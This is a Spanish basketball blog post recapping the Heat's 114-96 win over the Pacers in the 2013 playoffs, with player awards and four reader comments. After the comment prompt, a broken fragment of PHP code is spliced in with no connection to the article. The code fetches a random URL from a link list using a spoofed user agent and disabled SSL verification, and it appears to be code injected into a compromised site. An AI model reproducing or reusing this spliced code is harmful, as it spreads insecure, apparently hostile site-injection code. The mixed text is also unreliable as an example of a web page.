La Crónica: El arte de lo previsible

27 de May de 2013 por MagicJohnson32

No falla. De manera previsible, casi como una rutina, avanzan estos Heat que parecen necesitar un susto como el recibido en Miami para sacar lo mejor de sí mismos, o al menos una versión que se le acerque. Con Spoelstra alzado como claro vencedor de la partida táctica contra Vogel, los Heat dominaron por completo a los Pacers en el Bankers Life Fieldhouse de Indianapolis en un despliegue total por parte de los de Florida (114-96).

heat bench

Entre poco y nada necesitaron los Heat para sacudirse las dudas resultantes del 1-1 que dejaron los dos primeros encuentros de la serie y la sensación de que la eliminatoria empezaba a abrirse fruto de la superioridad de los Pacers en la pintura. Salieron ambos equipos como tiros, pero los locales apenas aguantaron hasta el 30-30, todavía en el primer cuarto. Entonces, los movimientos tácticos visitantes empezaron a hacer mella en el marcador. Spoelstra detectó nuevas vías para desarmar la defensa rival y mandó a LeBron James a postear insistentemente a Paul George, una situación que anuló el impacto de Roy Hibbert y generó un desequilibrio tras otro que Vogel no supo contener. Como beneficio añadido, George pagó el desgaste (o tal vez la presión) y, más allá de sus 8 asistencias, dejó un partido discretísimo también en el otro lado de la cancha.

En un momento, la ventaja de los Heat ya era de diez puntos (42-32). Ante la dimisión de George, eran David West y Roy Hibbert los encargados de sostener a su equipo, una tarea que se tornó imposible por la aparición en escena del mejor Udonis Haslem del año. El veterano PF estuvo prácticamente infalible y resultó, junto a Chris Andersen, una pesadilla para los Pacers: 12 de 13 en tiros de campo, 26 puntos y 16 rebotes lograron entre ambos.

El marcador al descanso, 70-56, ponía en evidencia que el partido se movía en un terreno impropio para Indiana, que no había encajado semejante cantidad de puntos en una mitad en toda la temporada. Así, ante la exhibición visitante, a los Pacers se les fueron agotando las respuestas y la segunda mitad no ofreció nada nuevo. Paul George hizo un amago de aparición, más por voluntad que por acierto, y la ventaja de los Heat no bajó de los 7 puntos (78-71) en parte a causa de los tiros libres errados por parte de los Pacers pero, ante todo, por la superioridad manifiesta de un equipo que reserva su mejor versión para cuando se siente amenazado.

PREMIOS

heat hibbertMVP: LeBron James se dedicó a postear y a abrir espacio para sus compañeros, que lo aprovecharon a la perfección. Todo el quinteto de Miami acabó por encima de los 14 puntos anotados. Dwyane Wade acabó el partido con 18 puntos, 4 rebotes, 8 asistencias y 2 tapones.

Sorpresa: Udonis Haslem fue esencial en la magnífica primera mitad de su equipo y finalizó el partido con 17 puntos tras anotar 8 de 9 en tiros de campo. El ala-pívot de los Heat encontró posiciones abiertas para lanzar y las aprovechó a la perfección.

Decepción: Esta vez Paul George no pudo parar a LeBron James, que anotó y distribuyó con fluidez desde el poste. Además, en ataque estuvo bastante espeso y sólo puedo anotar 13 puntos.

Esfuerzo en vano: Roy Hibbert y David West representaron el mayor dolor de cabeza para Miami. El primero acabó con 20 puntos y 17 rebotes y el segundo con 21 puntos y 10 rebotes.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Vuelta a la normalidad y desencanto de los que esperábamos que la serie siguiera por los mismos derroteros que se vió en Miami.
    Esta vez no hubo partidazo de por medio y los Heat encontraron la forma de superar claramente a la defensa de los Pacers y llevar el partido a una anotación alta lo cual es sinónimo de victoria casi segura para ellos en estas series.
    En el primer cuarto ambos equipos salieron como un tiro pero mientras esto era una buena noticia para Miami, yo creo que no lo era tanto para los Pacers. Con Bosh y Haslem aprovechando todos los tiros abiertos y espacios que provocaba un LeBron metido al poste para hacer sufrir a George, los Heat encontraron por fin la fluidez en su juego que no habían encontrado en ningún momento de los dos primeros partidos.
    Los Pacers seguían dominando la pintura en ataque pero ante unos Heat lanzados en ataque pronto se vió que no iba a ser suficiente. Con Wade también mejor y Andersen y Haslem matando la defensa de Indiana el partido transcurrió con claras y cómodas ventajas de los Heat desde el segundo cuarto y sólo un amago de reacción de los Pacers desde la defensa al inicio del tercer cuarto dió sensación de poder cambiar algo.
    Los Heat toman la delantera y sobre todo devuelven la sensación de que son claramente superiores tras unos dos primeros partidos que nos hicieron dudar a todos. Indiana deberá volver a ralentizar el tempo e intentar que los Heat vuelvan a perder balones y lanzar malos tiros para poder volver a dominar la situación con sus interiores aunque ahora parece más difícil que puedan volver a poner las cosas complicadas a unn equipo que parece ponerse las pilas de cara a la recta final por el anillo.
    Es de esperar mejor defensa de los Pacers para un cuarto donde se jugarán la vida. Veremos si Vogel hace algo con el marcaje del juego al poste de LeBron que tantos problemas le ha dado en este partido para que la defensa de Indiana vuelva a dar problemas al equipo de Florida, si no estarán perdidos

      Citar

  2. rumbero dice:
    #2

    No se puede acertar más con el título. Esperemos que no se nos acabe la eliminatoria en el próximo partido, pero cuando Miami saca a pasear su mejor versión se complica el asunto. Muy bien Lebron que hizo un partidazo sin tener que meter 40 puntos y Wade que aun al 75% es mejor jugador que la mayoría. Si encima el resto estan algo enchufados (como se reclamaba) y Haslem se pone a jugar así ya puedes ir cerrando el chiringuito. Indiana va a tener que frenar mucho más el ritmo de cara al Game4 y más jugando en casa porque lo tienen que ganar si o si.

    Por cierto que la primera ventaja gorda que pilló Miami fue con Hibbert en el lavabo por un apretón. Que le den un fortasec al hombre para el próximo anda…

      Citar

  3. Sancho88 dice:
    #3

    El partido un cacote… con lo que han molado estos Pacers en Miami, ahora se les nota que están fundidos. Si se vuelven a dejar llevar en el cuarto, se acabó la eliminatoria. 4-1 segurísimo. Van a tener que echarle pelotas para poder llegar al sexto juego.

      Citar

  4. Esteban dice:
    #4

    y esto ya se aparece mas a el analisis previo, los pacers fuertes y duros, lastimando en la pintura y haciendo sudar al heat, pero se dijo en aquel momento, es casi imposible que indiana pueda vencer a miami a 7 juegos, podran ganar algunos, llevar a prorroga otros, pero el heat es demasiado mejor equipo

    si los pacers contaran con al menos un escolta o alero suplente capaz de encestar con cierta fluidez (esilo crawford, terry o el año pasado el propio barbosa) podria cambiar en algo esta percepcion, pero lo cierto es que indiana tiene demasiadas pocas herramientas ofensivas como para vender a un señor equipo como el heat

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>